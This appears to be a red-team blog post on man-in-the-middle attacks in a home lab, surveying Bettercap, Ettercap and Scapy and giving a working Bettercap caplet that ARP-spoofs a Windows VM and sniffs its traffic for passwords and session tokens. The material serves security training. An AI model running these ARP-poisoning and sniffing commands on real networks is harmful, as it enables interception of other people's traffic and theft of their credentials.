Skip to main content
  1. Red team/
  2. Tatic/
  3. T1557 - Adversary-in-the-Middle/

Hands-on MITM: Using Bettercap, Ettercap, and Scapy in a Red Team Engagement

·4 mins·
Redteam MITM Bettercap Ettercap Scapy Network
Broder
Author
Broder
Only the ones who have a true passion for mastering security truly stand out.
Table of Contents

Environment

Kali Linux(VM): 192.168.241.134 NAT

Windows10(VM): 192.168.241.145 NAT

Bettercap
#

Bettercap is a modern, flexible, and scriptable tool for:

  • Network sniffing and traffic manipulation
  • Man-in-the-Middle (MITM) attacks
  • Credential harvesting
  • Wireless network and Bluetooth testing

It’s written in Go, making it fast, portable, and more reliable than older tools like Ettercap.


Bettercap is commonly used in:

  • MITM attacks (ARP spoofing, DNS spoofing, HTTPS interception)
  • Credential theft (capturing passwords and tokens in transit)
  • Reconnaissance (discovering live hosts and services)
  • Wireless attacks (Wi-Fi and Bluetooth sniffing, deauth, spoofing)
  • Red team infrastructure (acting as a proxy or relay)

Advantages
#

  • Modular & scriptable
  • Cross-platform (Linux, macOS, Windows, Raspberry Pi)
  • Real-time interactive UI
  • Actively maintained
  • Combines many features in one tool

Disadvantages
#

  • Noisy (easy to detect in monitored networks)
  • Not stealthy by default
  • Learning curve for beginners
  • Can disrupt traffic if misconfigured

sniff.cap

# Scans the local network to discover live hosts and services. This helps you identify who is available as a potential target.
net.probe on

# Enables full-duplex mode so traffic flows both ways (victim ↔ gateway). Without this, you would only see one side of the communication.
# If true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail). (default=false)
set arp.spoof.fullduplex true

# Specifies the target host for the attack. Targeting a single machine is quieter and less disruptive than attacking the entire network.
set arp.spoof.targets 192.168.241.145

# Captures traffic going to and from your own attacker machine
set net.sniff.local true

# Launches the ARP spoofing attack. The victim’s ARP table is poisoned so that their traffic is redirected through your machine.
arp.spoof on

# Starts the packet sniffer. Bettercap will now log captured traffic and extract useful data such as usernames, passwords, or session tokens.
net.sniff on

sudo bettercap -iface eth1 -caplet sniff.cap

Ettercap
#

Ettercap is a classic network security tool designed for:

  • Man-in-the-Middle (MITM) attacks
  • Network protocol analysis
  • Packet sniffing and filtering
  • Host and network reconnaissance

It’s written in C and has been around since the early 2000s, making it one of the first widely used MITM tools in penetration testing and security research.


Ettercap is commonly used in:

  • ARP poisoning to place the attacker between victim and gateway
  • DNS spoofing to redirect traffic to malicious hosts
  • Password sniffing for protocols like HTTP, FTP, POP, IMAP, Telnet
  • Session hijacking by injecting or modifying traffic
  • Network discovery to map hosts and services

Advantages
#

  • Simple to use with both GUI and command-line interface
  • Supports many classic MITM techniques out of the box
  • Plugin system allows extending functionality
  • Widely documented with tutorials and community support
  • Lightweight (runs even on older systems)

Disadvantages
#

  • Outdated compared to modern tools (less active development)
  • Limited support for newer encrypted protocols (HTTPS, TLS 1.3, modern ciphers)
  • Less stealthy and easier to detect in modern networks
  • Not as flexible or scriptable as tools like Bettercap
  • Can cause instability on networks if misused

Capture credential Some ip address has the same MAC address

Scapy
#

Scapy is a powerful Python-based packet manipulation library used for:

  • Crafting and sending custom packets
  • Sniffing, decoding, and analyzing network traffic
  • Network discovery and scanning
  • Exploitation and proof-of-concept attacks

Unlike Bettercap or Ettercap (which are ready-to-use tools), Scapy is more of a framework for building your own network attack or analysis scripts. It’s extremely flexible for both red teamers and researchers.


Scapy is commonly used in:

  • Custom MITM attacks (e.g., ARP spoofing scripts, DNS poisoning)
  • Packet crafting for fuzzing or protocol testing
  • Traffic sniffing and writing custom parsers
  • Reconnaissance (host discovery, port scanning, traceroutes)
  • Proof-of-concept exploits where fine-grained packet control is required

Advantages
#

  • Extremely flexible (you can craft packets at any OSI layer)
  • Python-based (easy to script and automate attacks/tests)
  • Great for learning how network protocols work
  • Useful for custom exploits and research beyond standard tools
  • Large community and plenty of examples online

Disadvantages
#

  • Not a turnkey tool (requires coding and scripting skills)
  • Slower than compiled tools like Bettercap for large-scale attacks
  • No built-in fancy UI — everything is code-driven
  • Easier to make mistakes that can crash networks or hosts
  • Requires Python environment setup and dependencies

Example
#

Get MAC
#

Fake MAC
#

Related

LLMNR/NBT-NS Poisoning and SMB Relay
·3 mins
Redteam Credential Access Exploit Chain SMB LLMNR NBT-NS NTLM Relay WinRM
Bypassing Network Restrictions Through RDP Tunneling
·4 mins
Redteam Ssh Rdp Persistence Evasion
SSH
·14 mins
Protocol Security Networking Shell
Remote SSH
·1 min
Redteam Ssh Phishing Vscode Remote-Access
Marco
·4 mins
Redteam Phishing Office365 C2
Artificial
·4 mins
HTB Machines
Compress
·5 mins
CTF Exploitation Pwn Write-Up Heap Unlink-Attack
Race Condition
13 mins
CTF Exploitation Operating Systems Vulnerability Analysis
pwnable.tw
·10 mins
CTF Exploitation Pwn Write-Up